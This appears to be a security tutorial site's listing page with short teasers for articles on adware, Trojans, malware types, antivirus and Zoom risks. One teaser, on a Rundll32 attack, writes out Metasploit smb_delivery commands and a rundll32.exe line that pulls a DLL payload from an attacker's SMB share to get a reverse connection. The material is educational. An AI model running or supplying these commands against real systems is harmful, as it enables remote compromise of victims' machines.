
Data Structure
Networking
RDBMS
Operating System
Java
MS Excel
iOS
HTML
CSS
Android
Python
C Programming
C++
C#
MongoDB
MySQL
Javascript
PHP
- Selected Reading
- UPSC IAS Exams Notes
- Developer's Best Practices
- Questions and Answers
- Effective Resume Writing
- HR Interview Questions
- Computer Glossary
- Who is Who
Found 987 Articles for Safe & Security

548 Views
If you are suddenly receiving random ads on your browser and system, it might be because of an Adware infection. This post will guide you on what is Adware, how do you get it, what are its symptoms, and how to protect your device from Adware.What is Adware?Adware is short for advertising-supported software. It is the extension or application responsible for ad displaying on your browser, applications, or system. Generally, Adware enters the system unintentionally, and therefore it comes under Potentially Unwanted Programs or PUP. Since it can conduct various malicious tasks after infiltrating your device, it is also one ... Read More

1K+ Views
In this chapter, we would learn about Trojan in detail. What it is, how it got its name, what are the common types of Trojan, how it works, and how to get rid of it if you encountered one.What is Trojan?The Trojan is a type of malware program or code that presents itself as a useful legitimate program so that users would get fascinated by it and install it. It usually tricks users by using social engineering techniques. Cyberattackers design Trojan to control the system to perform various vicious tasks such as stealing private information & secret files, damage the ... Read More

2K+ Views
Malware is a term used to describe a computer program responsible for causing a disturbance in your system's working and carrying out other illicit activities. In this chapter, we would learn what the different types of malware are and how they get infiltrated into the system.Types of MalwareBased on the infiltrating nature, attack type, and damage levels, malware are broadly classified into 12 types.1. VirusesThe virus is the oldest Malware type and one of the most common. It is a computer program that, after infiltrating the system, replicate itself by modifying the codes of other programs. It also has the ... Read More

2K+ Views
If your computer or smartphone has suddenly started misbehaving, then it might be because of a Malware program. In this chapter, we would know what Malware is and what are its common types.What is Malware?The term Malware is a combination of two words Malicious and Software. It is a common term that is used to denote a software or script that is implicitly designed to create damage to any computer, smartphone, IoT devices, Network, and other programable devices. The damage can be anything like hijacking the browser, locking the essential files, degrading the device's performance, and many such.The term Malware was ... Read More

659 Views
Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0Read More

2K+ Views
Both Internet Security and Antivirus are the techniques that are being used to protect the user from malicious programs by blocking and removing them specifically when the user interacts with external resources.An Antivirus could be defined as an application or software which provides security from the malicious software specifically coming from the Internet. In contrast, Internet Security is a term that is used for a wide range of issues; we can think of it as a collection of Apps designed to protect users from online threats.In this article, we will take a look at the different features of an Antivirus ... Read More

14K+ Views
Viruses, Worms, and Trojan Horses are types of malicious software that infiltrate a system and try to create havoc, however what sets them apart is the way they attack, spread, and replicate. Read though this article to get an overview of how a virus is different from a worm, and what exactly is a Trojan Horse. What is a Virus? A virus is malicious software (malware) made up of little bits of code attached to legitimate programs. When that software is launched, the virus is launched as well. Viruses are malicious programs that infect computer files and spread ... Read More

197 Views
This article poses a common advisory and security measure note for the Zoom users to protect themself from presumptive hacking attempt, as this application is quite vulnerable to breach. Zoom is quite trending and its popularity mysteriously skyrocket in last 3 month in terms of downloads (20 CR) despite having other plethora of amazing video conferencing application. Zoom does not have the End-to-end encryption facility like whatsapp and WebEx and attackers can potentially gain control to the ZOOM without its user’s cognizance by mean of a secret tools called zWarDial.However, I am not going to discuss the usage of this ... Read More

19K+ Views
From a security standpoint, threats and attacks are two critical occurrences. From the perspective of network security, it is critical to grasp the differences between the two.A threat in the realm of information security is the presence of a persistent hazard to information integrity. This might take the shape of a human, a computer virus or malware, or something else.An attack, on the other hand, is the actual act of exploiting the information security system's weaknesses.There are a number of network security dangers and attacks to be aware of, such as Information theft and fraud, putting a halt to routine ... Read More

2K+ Views
A Malware is a malicious program that is used by attackers to perform illegal operations on a user's machine, such as stealing personal information, corrupting system/network, encrypting data for "ransom" or deleting the data, etc.An Adware is a program that displays Ads during its execution. Developers get money from this advertisement. This application may capture user activity and display ads accordingly. An attacker can misuse this feature of adware and can compromise the system security.Read through this article to find out more about Malware and Adware and how they are different from each other.What is a Malware?Malware is any program ... Read More